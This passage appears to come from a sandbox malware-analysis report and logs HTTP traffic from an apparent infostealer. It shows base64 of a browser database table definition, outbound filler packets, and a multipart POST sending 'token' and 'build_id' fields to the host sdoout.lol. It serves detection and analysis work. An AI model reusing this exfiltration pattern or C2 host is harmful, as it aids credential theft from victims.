vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-12-31 08:46:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:23 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:24 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:46:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 08:46:24 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:31 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----s2va1no8glnymy58gl6f User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 3165 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 08:46:31 UTC	3165	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 73 32 76 61 31 6e 6f 38 67 6c 6e 79 6d 79 35 38 67 6c 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 73 32 76 61 31 6e 6f 38 67 6c 6e 79 6d 79 35 38 67 6c 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 73 32 76 61 31 6e 6f 38 67 6c 6e 79 6d 79 35 38 67 6c 36 66 0d 0a 43 6f 6e 74 Data Ascii: ------s2va1no8glnymy58gl6fContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------s2va1no8glnymy58gl6fContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------s2va1no8glnymy58gl6fCont
2024-12-31 08:46:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:46:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 08:46:31 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0